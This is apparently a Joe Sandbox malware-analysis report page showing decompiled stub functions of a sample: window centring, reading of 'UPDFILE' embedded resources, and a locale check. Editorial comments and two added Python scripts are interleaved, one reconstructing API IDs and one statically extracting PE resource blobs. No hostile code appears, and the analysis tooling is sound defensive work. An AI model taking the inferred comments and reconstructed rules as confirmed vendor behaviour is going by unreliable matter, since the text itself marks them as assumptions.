Instruction addresses for the decompiled lines of E00FD2AAC above (one per decompiled line; the line-to-address pairing was lost in extraction, 0x00000000 marks lines with no instruction): 0x00fd2aac 0x00fd2ab7 0x00fd2abc 0x00fd2abe 0x00fd2ac3 0x00fd2ac6 0x00fd2ac9 0x00fd2ace 0x00fd2ae6 0x00fd2bdc 0x00fd2bdc 0x00fd2be0 0x00000000 0x00000000 0x00fd2af2 0x00fd2afc 0x00fd2b00 0x00fd2b05 0x00fd2b05 0x00fd2b0b 0x00fd2bca 0x00fd2bd1 0x00fd2b11 0x00fd2b18 0x00fd2b26 0x00fd2b99 0x00fd2bc8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd2b9b
                                                                                                                                                                                                    0x00fd2bae
                                                                                                                                                                                                    0x00fd2bb3
                                                                                                                                                                                                    0x00fd2bb5
                                                                                                                                                                                                    0x00fd2bb5
                                                                                                                                                                                                    0x00fd2bb8
                                                                                                                                                                                                    0x00fd2bb8
                                                                                                                                                                                                    0x00fd2bba
                                                                                                                                                                                                    0x00fd2bbb
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd2bb8
                                                                                                                                                                                                    0x00fd2b28
                                                                                                                                                                                                    0x00fd2b2e
                                                                                                                                                                                                    0x00fd2b33
                                                                                                                                                                                                    0x00fd2b39
                                                                                                                                                                                                    0x00fd2b3c
                                                                                                                                                                                                    0x00fd2b3c
                                                                                                                                                                                                    0x00fd2b3e
                                                                                                                                                                                                    0x00fd2b3f
                                                                                                                                                                                                    0x00fd2b55
                                                                                                                                                                                                    0x00fd2b5d
                                                                                                                                                                                                    0x00fd2b64
                                                                                                                                                                                                    0x00fd2b64
                                                                                                                                                                                                    0x00fd2b7a
                                                                                                                                                                                                    0x00fd2b7f
                                                                                                                                                                                                    0x00fd2b81
                                                                                                                                                                                                    0x00fd2b81
                                                                                                                                                                                                    0x00fd2b84
                                                                                                                                                                                                    0x00fd2b84
                                                                                                                                                                                                    0x00fd2b86
                                                                                                                                                                                                    0x00fd2b87
                                                                                                                                                                                                    0x00fd2bbf
                                                                                                                                                                                                    0x00fd2bc1
                                                                                                                                                                                                    0x00fd2bc1
                                                                                                                                                                                                    0x00fd2b26
                                                                                                                                                                                                    0x00fd2bda
                                                                                                                                                                                                    0x00fd2bda
                                                                                                                                                                                                    0x00fd2be6
                                                                                                                                                                                                    0x00fd2be6
                                                                                                                                                                                                    0x00fd2bf8

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00FD2AE6
                                                                                                                                                                                                    • IsDBCSLeadByte.KERNEL32(00000000), ref: 00FD2AF2
                                                                                                                                                                                                    • CharNextA.USER32(?), ref: 00FD2B12
                                                                                                                                                                                                    • CharUpperA.USER32 ref: 00FD2B1E
                                                                                                                                                                                                    • CharPrevA.USER32(?,?), ref: 00FD2B55
                                                                                                                                                                                                    • CharNextA.USER32(?), ref: 00FD2BD4
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 571164536-0
                                                                                                                                                                                                    • Opcode ID: 1d277b9f290cfcc9e8aa53409f2808d22f1175e14eb47c5c03da96a04a42789e
                                                                                                                                                                                                    • Instruction ID: cdf7e66a27cef3e35aff9842840c702b07aee77be394e21d0a04d164c65cd35e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d277b9f290cfcc9e8aa53409f2808d22f1175e14eb47c5c03da96a04a42789e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 384127349041495EDB559F348C54AFD7B6B9FA6310F0C009BE8C287302DBB58E86EBA0
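The API ID in the Similarity block is a compact fingerprint of which word tokens of the called API names a function uses and how often; the same token multiset is what lets a function be matched against functions in other samples. The script below is an added example, not Joe Sandbox's own code: it reproduces the ID shown above from the API list given for this function, using a CamelCase tokenisation and a stop-token set that are inferred from the page's own string (which verbs and abbreviations Joe Sandbox actually discards is an assumption), and adds a weighted-Jaccard similarity between two functions' token counts. WINDOW_CALLS is the call list read off the decompiled E00FD43D0 function further down this page.

```python
"""Reconstruct a Joe Sandbox-style API ID and compare functions by API usage.

Added example, not Joe Sandbox code.  The tokenisation rules and STOP_TOKENS are
inferred from the API ID shown on this page
("Char$Next$ByteFileLeadModuleNamePrevUpper") and are assumptions.
"""
from __future__ import annotations

import re
from collections import Counter

# API calls listed on this page for the function at 0x00FD2ACE (module names as shown).
API_CALLS = [
    "GetModuleFileNameA.KERNEL32",
    "IsDBCSLeadByte.KERNEL32",
    "CharNextA.USER32",
    "CharUpperA.USER32",
    "CharPrevA.USER32",
    "CharNextA.USER32",
]

# API calls made by the decompiled E00FD43D0 (window-centring) function on this page.
WINDOW_CALLS = [
    "GetWindowRect.USER32",
    "GetWindowRect.USER32",
    "GetDC.USER32",
    "GetDeviceCaps.GDI32",
    "GetDeviceCaps.GDI32",
    "ReleaseDC.USER32",
    "SetWindowPos.USER32",
]

# Assumption: plain verbs carry no discriminating information and are dropped.
# "Get" and "Is" are absent from the page's ID; "Set" is added by analogy.
STOP_TOKENS = {"Get", "Is", "Set"}

_TOKEN_RE = re.compile(r"[A-Z]+(?![a-z])|[A-Z][a-z]+|[a-z]+|\d+")


def camel_tokens(name: str) -> list[str]:
    """Split a CamelCase API name; all-caps runs such as DBCS or DC stay one token."""
    return _TOKEN_RE.findall(name)


def token_counts(calls: list[str], stop: set[str] = STOP_TOKENS) -> Counter[str]:
    """Count the word tokens of each call's API name (module suffix stripped)."""
    counts: Counter[str] = Counter()
    for call in calls:
        name = call.split(".", 1)[0]  # "CharNextA.USER32" -> "CharNextA"
        for tok in camel_tokens(name):
            # Drop stop verbs and anything that is not a capitalised word: the A/W
            # charset suffix and abbreviations like DBCS, which the page's ID lacks.
            if tok in stop or not re.fullmatch(r"[A-Z][a-z]+", tok):
                continue
            counts[tok] += 1
    return counts


def api_id(calls: list[str]) -> str:
    """Tokens grouped by frequency (highest first, groups joined with '$'),
    alphabetical and concatenated inside a group."""
    by_freq: dict[int, list[str]] = {}
    for tok, n in token_counts(calls).items():
        by_freq.setdefault(n, []).append(tok)
    return "$".join("".join(sorted(by_freq[n])) for n in sorted(by_freq, reverse=True))


def similarity(a: list[str], b: list[str]) -> float:
    """Weighted Jaccard over token counts: 1.0 means identical API vocabulary."""
    ca, cb = token_counts(a), token_counts(b)
    keys = set(ca) | set(cb)
    inter = sum(min(ca[t], cb[t]) for t in keys)
    union = sum(max(ca[t], cb[t]) for t in keys)
    return inter / union if union else 0.0


if __name__ == "__main__":
    print(api_id(API_CALLS))
    print(api_id(WINDOW_CALLS))
    print(f"{similarity(API_CALLS, WINDOW_CALLS):.2f}")
```

Only the first ID can be checked against the page; the ID for WINDOW_CALLS follows the same inferred rules and is not something the report prints. A weighted Jaccard is used rather than a plain set comparison so that a function calling CharNextA in a loop four times scores closer to one that calls it three times than to one that calls it once.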
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

C-Code - Quality: 86%
			// Decompiled by Joe Sandbox. Centres the window __ecx over the window __edx
			// and clamps the result to the primary display. _v8 is a stack cookie
			// (global at 0xfd8004 XOR esp); E00FD6CE0 is most likely the cookie check
			// (__security_check_cookie), an assumption from its call position that the
			// report does not confirm.
			E00FD43D0(struct HWND__* __ecx, struct HWND__* __edx) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				int _v52;
				intOrPtr _v56;
				int _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				void* _t53;
				intOrPtr _t56;
				int _t59;
				struct HWND__* _t63;
				struct HWND__* _t67;
				struct HWND__* _t68;
				struct HDC__* _t69;
				int _t72;
				signed int _t74;

				_t63 = __edx;
				_t29 =  *0xfd8004; // 0x42de454f, stack cookie seed
				_v8 = _t29 ^ _t74;
				_t68 = __edx;
				_v44 = __ecx;
				GetWindowRect(__ecx,  &_v40);              // window to move
				_t53 = _v40.bottom - _v40.top;             // its height
				_v48 = _v40.right - _v40.left;             // its width
				GetWindowRect(_t68,  &_v24);               // reference window
				_v56 = _v24.bottom - _v24.top;             // reference height
				_t69 = GetDC(_v44);
				_v52 = GetDeviceCaps(_t69, 8);             // 8 = HORZRES, screen width
				_v60 = GetDeviceCaps(_t69, 0xa);           // 0xa = VERTRES, screen height
				ReleaseDC(_v44, _t69);
				_t56 = _v48;
				asm("cdq");                                // cdq/sub/sar: signed divide by two; _t63 holds the sign word
				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;   // centred x
				_t67 = 0;
				if(_t72 >= 0) {
					_t63 = _v52;
					if(_t72 + _t56 > _t63) {               // keep right edge on screen
						_t72 = _t63 - _t56;
					}
				} else {
					_t72 = _t67;                           // never left of the screen
				}
				asm("cdq");
				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;                       // centred y
				if(_t59 >= 0) {
					_t63 = _v60;
					if(_t59 + _t53 > _t63) {               // keep bottom edge on screen
						_t59 = _t63 - _t53;
					}
				} else {
					_t59 = _t67;
				}
				// 5 = SWP_NOSIZE | SWP_NOZORDER: move only, cx/cy and hWndInsertAfter ignored
				return E00FD6CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
			}

(Disassembly listing for E00FD43D0: only the instruction addresses, starting at 0x00fd43d0, survived extraction; the instruction text and operands are not present on this page.)
                                                                                                                                                                                                    0x00fd445b
                                                                                                                                                                                                    0x00fd4460
                                                                                                                                                                                                    0x00fd4461
                                                                                                                                                                                                    0x00fd4467
                                                                                                                                                                                                    0x00fd446f
                                                                                                                                                                                                    0x00fd4473
                                                                                                                                                                                                    0x00fd4473
                                                                                                                                                                                                    0x00fd4463
                                                                                                                                                                                                    0x00fd4463
                                                                                                                                                                                                    0x00fd4463
                                                                                                                                                                                                    0x00fd447a
                                                                                                                                                                                                    0x00fd4481
                                                                                                                                                                                                    0x00fd4484
                                                                                                                                                                                                    0x00fd448a
                                                                                                                                                                                                    0x00fd4492
                                                                                                                                                                                                    0x00fd4496
                                                                                                                                                                                                    0x00fd4496
                                                                                                                                                                                                    0x00fd4486
                                                                                                                                                                                                    0x00fd4486
                                                                                                                                                                                                    0x00fd4486
                                                                                                                                                                                                    0x00fd44b8

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00FD43F1
                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00FD440B
                                                                                                                                                                                                    • GetDC.USER32(?), ref: 00FD4423
                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 00FD442E
                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00FD443A
                                                                                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00FD4447
                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,00000001,?), ref: 00FD44A2
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2212493051-0
                                                                                                                                                                                                    • Opcode ID: fa0d0887519f04d49b6baf96c29dfdda0e5bebd77b5e909315e4b02f34eb0714
                                                                                                                                                                                                    • Instruction ID: cd86f16827f7777b930e638c07dd5ce22ecdf460e23b60a68a6a9507a54c4ad6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fa0d0887519f04d49b6baf96c29dfdda0e5bebd77b5e909315e4b02f34eb0714
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A5313E32E01119AFCB14CFB8DD899EEBBB6EB89310F19416AF805F3250DA306D459B64
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 53%
                                                                                                                                                                                                    			E00FD6298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v28;
                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                    				struct HINSTANCE__* _v36;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t16;
                                                                                                                                                                                                    				struct HRSRC__* _t21;
                                                                                                                                                                                                    				intOrPtr _t26;
                                                                                                                                                                                                    				void* _t30;
                                                                                                                                                                                                    				struct HINSTANCE__* _t36;
                                                                                                                                                                                                    				intOrPtr* _t40;
                                                                                                                                                                                                    				void* _t41;
                                                                                                                                                                                                    				intOrPtr* _t44;
                                                                                                                                                                                                    				intOrPtr* _t45;
                                                                                                                                                                                                    				void* _t47;
                                                                                                                                                                                                    				signed int _t50;
                                                                                                                                                                                                    				struct HINSTANCE__* _t51;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t44 = __edx;
                                                                                                                                                                                                    				_t16 =  *0xfd8004; // 0x42de454f
                                                                                                                                                                                                    				_v8 = _t16 ^ _t50;
                                                                                                                                                                                                    				_t46 = 0;
                                                                                                                                                                                                    				_v32 = __ecx;
                                                                                                                                                                                                    				_v36 = 0;
                                                                                                                                                                                                    				_t36 = 1;
                                                                                                                                                                                                    				E00FD171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                    					_t51 = _t51 + 0x10;
                                                                                                                                                                                                    					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                                                                                                                                                    					if(_t21 == 0) {
                                                                                                                                                                                                    						break;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                                                                                                                                                    					if(_t45 == 0) {
                                                                                                                                                                                                    						 *0xfd9124 = 0x80070714;
                                                                                                                                                                                                    						_t36 = _t46;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t5 = _t45 + 8; // 0x8
                                                                                                                                                                                                    						_t44 = _t5;
                                                                                                                                                                                                    						_t40 = _t44;
                                                                                                                                                                                                    						_t6 = _t40 + 1; // 0x9
                                                                                                                                                                                                    						_t47 = _t6;
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t26 =  *_t40;
                                                                                                                                                                                                    							_t40 = _t40 + 1;
                                                                                                                                                                                                    						} while (_t26 != 0);
                                                                                                                                                                                                    						_t41 = _t40 - _t47;
                                                                                                                                                                                                    						_t46 = _t51;
                                                                                                                                                                                                    						_t7 = _t41 + 1; // 0xa
                                                                                                                                                                                                    						 *0xfda288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                                                                                                                                                    						_t30 = _v32();
                                                                                                                                                                                                    						if(_t51 != _t51) {
                                                                                                                                                                                                    							asm("int 0x29");
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_push(_t45);
                                                                                                                                                                                                    						if(_t30 == 0) {
                                                                                                                                                                                                    							_t36 = 0;
                                                                                                                                                                                                    							FreeResource(??);
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							FreeResource();
                                                                                                                                                                                                    							_v36 = _v36 + 1;
                                                                                                                                                                                                    							E00FD171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                                                                                                                                                    							_t46 = 0;
                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                    					return E00FD6CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				goto L12;
                                                                                                                                                                                                    			}

                                                                                                                                                                                                    0x00fd62e5
                                                                                                                                                                                                    0x00fd62e8
                                                                                                                                                                                                    0x00fd62e8
                                                                                                                                                                                                    0x00fd62ea
                                                                                                                                                                                                    0x00fd62eb
                                                                                                                                                                                                    0x00fd62ef
                                                                                                                                                                                                    0x00fd62f1
                                                                                                                                                                                                    0x00fd62f3
                                                                                                                                                                                                    0x00fd6302
                                                                                                                                                                                                    0x00fd6308
                                                                                                                                                                                                    0x00fd630d
                                                                                                                                                                                                    0x00fd6314
                                                                                                                                                                                                    0x00fd6314
                                                                                                                                                                                                    0x00fd6316
                                                                                                                                                                                                    0x00fd6319
                                                                                                                                                                                                    0x00fd6355
                                                                                                                                                                                                    0x00fd6357
                                                                                                                                                                                                    0x00fd631b
                                                                                                                                                                                                    0x00fd631b
                                                                                                                                                                                                    0x00fd6331
                                                                                                                                                                                                    0x00fd6334
                                                                                                                                                                                                    0x00fd6339
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd6339
                                                                                                                                                                                                    0x00fd6319
                                                                                                                                                                                                    0x00fd636b
                                                                                                                                                                                                    0x00fd637d
                                                                                                                                                                                                    0x00fd637d
                                                                                                                                                                                                    0x00000000

APIs
  • Part of subcall function 00FD171E: _vsnprintf.MSVCRT ref: 00FD1750
• LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,00FD51CA,00000004,00000024,00FD2F71,?,00000002,00000000), ref: 00FD62CD
• LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,00FD51CA,00000004,00000024,00FD2F71,?,00000002,00000000), ref: 00FD62D4
• FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00FD51CA,00000004,00000024,00FD2F71,?,00000002,00000000), ref: 00FD631B
• FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00FD6345
• FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00FD51CA,00000004,00000024,00FD2F71,?,00000002,00000000), ref: 00FD6357
Strings
Memory Dump Source
• Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
Similarity
• API ID: Resource$Free$FindLoadLock_vsnprintf
• String ID: UPDFILE%lu
• API String ID: 2922116661-2329316264
• Opcode ID: fe4b3b747c407a81e675f9698edb1d44cf1a059db20c63215f302b593e9191f0
• Instruction ID: 97b08236f87db99913e1c0ac444bb363c8837acef48d7ca12f88367b90ebee70
• Opcode Fuzzy Hash: fe4b3b747c407a81e675f9698edb1d44cf1a059db20c63215f302b593e9191f0
• Instruction Fuzzy Hash: D821F672A00219ABDB109FB4CC499BE7B7AFB44710B08011BF902E3341DB359D02ABE5
Uniqueness

Uniqueness Score: -1.00%
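The API list above shows the stub formatting a resource name from "UPDFILE%lu" (_vsnprintf), looking it up with FindResourceA using lpType 0x0A (RT_RCDATA), and then LoadResource/LockResource/FreeResource to read it: the usual way an executable pulls embedded payload blobs out of its own resource section. An analyst normally wants those blobs without running the sample. The following is an added example, not code from the report, from Joe Sandbox, or from the analysed file: a dependency-free Python walker that parses the PE resource tree and returns every RT_RCDATA entry named UPDFILE<n>. It assumes the resources are RT_RCDATA (the 0x0A argument) and that the image is PE32 or PE32+; the test image is constructed inline by build_sample_pe(), so no bytes here come from file.exe.

```python
# Added example: static extraction of RT_RCDATA resources named UPDFILE<n>.
# Assumption: the stub's resources are RT_RCDATA (FindResourceA lpType 0x0A).
# build_sample_pe() fabricates a minimal PE32 for offline testing only.
import re
import struct

RT_RCDATA = 10                                  # lpType 0x0A in FindResourceA
NAME_PATTERN = re.compile(r"UPDFILE(\d+)")      # names produced by "UPDFILE%lu"


def _rva_to_off(sections, rva):
    """Map an RVA to a file offset via the section table."""
    for va, vsize, raw_ptr, raw_size in sections:
        if va <= rva < va + max(vsize, raw_size):
            return rva - va + raw_ptr
    raise ValueError(f"RVA {rva:#x} lies outside every section")


def _walk(data, base, dir_off, path, leaves):
    """Depth-first walk of IMAGE_RESOURCE_DIRECTORY, collecting data entries."""
    n_named, n_id = struct.unpack_from("<HH", data, base + dir_off + 12)
    for i in range(n_named + n_id):
        name, off = struct.unpack_from("<II", data, base + dir_off + 16 + 8 * i)
        if name & 0x80000000:                   # IMAGE_RESOURCE_DIR_STRING_U
            s = base + (name & 0x7FFFFFFF)
            length = struct.unpack_from("<H", data, s)[0]
            key = data[s + 2:s + 2 + 2 * length].decode("utf-16-le")
        else:
            key = name & 0xFFFF                 # numeric id (type or language)
        if off & 0x80000000:                    # high bit set: subdirectory
            _walk(data, base, off & 0x7FFFFFFF, path + (key,), leaves)
        else:                                   # IMAGE_RESOURCE_DATA_ENTRY
            rva, size = struct.unpack_from("<II", data, base + off)
            leaves.append((path + (key,), rva, size))


def extract_updfiles(data):
    """Return {n: payload_bytes} for every RT_RCDATA resource named UPDFILE<n>."""
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    n_sections = struct.unpack_from("<H", data, pe + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe + 20)[0]
    opt = pe + 24
    magic = struct.unpack_from("<H", data, opt)[0]
    data_dirs = opt + (96 if magic == 0x10B else 112)   # PE32 vs PE32+
    rsrc_rva = struct.unpack_from("<I", data, data_dirs + 2 * 8)[0]  # entry 2
    sections = []
    for i in range(n_sections):
        hdr = opt + opt_size + 40 * i
        vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", data, hdr + 8)
        sections.append((va, vsize, raw_ptr, raw_size))
    if rsrc_rva == 0:
        return {}
    leaves = []
    _walk(data, _rva_to_off(sections, rsrc_rva), 0, (), leaves)
    found = {}
    for path, rva, size in leaves:              # path = (type, name, language)
        if len(path) == 3 and path[0] == RT_RCDATA and isinstance(path[1], str):
            m = NAME_PATTERN.fullmatch(path[1])
            if m:
                off = _rva_to_off(sections, rva)
                found[int(m.group(1))] = bytes(data[off:off + size])
    return found


def build_sample_pe(payloads, rsrc_rva=0x1000, rsrc_ptr=0x200):
    """Constructed minimal PE32: one .rsrc section, RT_RCDATA/UPDFILE<i>/0x409."""
    n = len(payloads)
    names = [f"UPDFILE{i}" for i in range(n)]
    type_dir = 24                                        # root dir is 24 bytes
    name_dir = [40 + 8 * n + 24 * i for i in range(n)]   # one dir per name
    data_ent = [40 + 32 * n + 16 * i for i in range(n)]  # 16-byte data entries
    str_off, cur = [], 40 + 48 * n
    for nm in names:
        str_off.append(cur)
        cur += 2 + 2 * len(nm)
    blob_off, cur = [], (cur + 3) & ~3
    for p in payloads:
        blob_off.append(cur)
        cur += len(p)
    rsrc = bytearray(cur)
    struct.pack_into("<HH", rsrc, 12, 0, 1)                             # root: 1 id
    struct.pack_into("<II", rsrc, 16, RT_RCDATA, 0x80000000 | type_dir)
    struct.pack_into("<HH", rsrc, type_dir + 12, n, 0)                  # n named
    for i, (nm, p) in enumerate(zip(names, payloads)):
        struct.pack_into("<II", rsrc, type_dir + 16 + 8 * i,
                         0x80000000 | str_off[i], 0x80000000 | name_dir[i])
        struct.pack_into("<HH", rsrc, name_dir[i] + 12, 0, 1)           # 1 language
        struct.pack_into("<II", rsrc, name_dir[i] + 16, 0x409, data_ent[i])
        struct.pack_into("<IIII", rsrc, data_ent[i], rsrc_rva + blob_off[i], len(p), 0, 0)
        struct.pack_into("<H", rsrc, str_off[i], len(nm))
        rsrc[str_off[i] + 2:str_off[i] + 2 + 2 * len(nm)] = nm.encode("utf-16-le")
        rsrc[blob_off[i]:blob_off[i] + len(p)] = p
    hdr = bytearray(rsrc_ptr)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 64)                               # e_lfanew
    hdr[64:68] = b"PE\0\0"
    struct.pack_into("<HHIIIHH", hdr, 68, 0x14C, 1, 0, 0, 0, 224, 0x102)
    struct.pack_into("<H", hdr, 88, 0x10B)                              # PE32 magic
    struct.pack_into("<II", hdr, 88 + 96 + 2 * 8, rsrc_rva, len(rsrc))  # resource dir
    struct.pack_into("<8sIIIIIIHHI", hdr, 312, b".rsrc", len(rsrc), rsrc_rva,
                     len(rsrc), rsrc_ptr, 0, 0, 0, 0, 0x40000040)
    return bytes(hdr + rsrc)


if __name__ == "__main__":
    image = build_sample_pe([b"MSCF" + bytes(12), b"second blob"])     # constructed
    for idx, blob in sorted(extract_updfiles(image).items()):
        print(f"UPDFILE{idx}: {len(blob)} bytes, starts {blob[:4]!r}")
```

Against a real sample, read the file into bytes and call extract_updfiles() on it; the returned blobs are what the stub would have obtained from LockResource, and their leading bytes (for instance a CAB "MSCF" magic) tell you what the next unpacking step is. The walker deliberately keys on the resource name rather than on a size heuristic, because the stub itself selects resources by name.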

C-Code - Quality: 94%
			/* Decompiler output (Joe Sandbox IDA plugin). The comments are the editor's:
			   symbolic names are the documented Win32 values of the literals shown; the roles
			   of E00FD66F9 and E00FD6CE0 are inferred from how they are called, not recovered. */
			E00FD681F(void* __ebx) {
				signed int _v8;                       /* saved stack-cookie XOR (checked in the epilogue) */
				char _v20;                            /* 12-byte buffer receiving the registry value */
				struct _OSVERSIONINFOA _v168;
				void* _v172;                          /* HKEY */
				int* _v176;                           /* receives the locale id parsed from _v20 */
				int _v180;                            /* lpcbData in/out for RegQueryValueExA */
				int _v184;                            /* lpType out for RegQueryValueExA */
				void* __edi;
				void* __esi;
				signed int _t19;
				long _t31;
				signed int _t35;
				void* _t36;
				intOrPtr _t41;
				signed int _t44;
			
				_t36 = __ebx;
				_t19 =  *0xfd8004; // 0x42de454f    (likely the /GS __security_cookie)
				_v8 = _t19 ^ _t44;                    /* _t44 holds the frame pointer */
				_t41 =  *0xfd81d8; // 0xfffffffe    (cached result; -2 means not yet computed)
				_t43 = 0;
				_v180 = 0xc;                          /* sizeof(_v20) */
				_v176 = 0;
				if(_t41 == 0xfffffffe) {
					 *0xfd81d8 = 0;                       /* default answer: no */
					_v168.dwOSVersionInfoSize = 0x94;     /* sizeof(OSVERSIONINFOA) == 148 */
					if(GetVersionExA( &_v168) == 0) {
						L12:
						_t41 =  *0xfd81d8; // 0xfffffffe
					} else {
						_t41 = 1;
						/* Interesting only on Windows 95 (dwPlatformId 1 == VER_PLATFORM_WIN32_WINDOWS,
						   version 4.0x, i.e. minor < 10) with Middle-East language support present
						   (GetSystemMetrics(0x4a) == SM_MIDEASTENABLED); then open
						   HKEY_CURRENT_USER (0x80000001) with KEY_READ (0x20019). */
						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
							goto L12;
						} else {
							/* 0xfd1140 points at the value name (not recovered in this listing) */
							_t31 = RegQueryValueExA(_v172, 0xfd1140, 0,  &_v184,  &_v20,  &_v180);
							_t43 = _t31;
							RegCloseKey(_v172);
							if(_t31 != 0) {
								goto L12;
							} else {
								_t40 =  &_v176;
								/* E00FD66F9: string -> number conversion of the locale value (inferred) */
								if(E00FD66F9( &_v20,  &_v176) == 0) {
									goto L12;
								} else {
									_t35 = _v176 & 0x000003ff;          /* PRIMARYLANGID(lcid) */
									if(_t35 == 1 || _t35 == 0xd) {      /* LANG_ARABIC (0x01) or LANG_HEBREW (0x0d) */
										 *0xfd81d8 = _t41;              /* cache the positive answer */
									} else {
										goto L12;
									}
								}
							}
						}
					}
				}
				/* E00FD6CE0 receives _v8 ^ _t44, i.e. the original cookie: the __security_check_cookie epilogue (inferred) */
				return E00FD6CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
			}


















(Address column of the decompiler view for E00FD681F: one address per decompiled line, 0x00fd681f to 0x00fd6924 on this page, shown without the lines it annotates.)
                                                                                                                                                                                                    0x00fd692b
                                                                                                                                                                                                    0x00fd6932
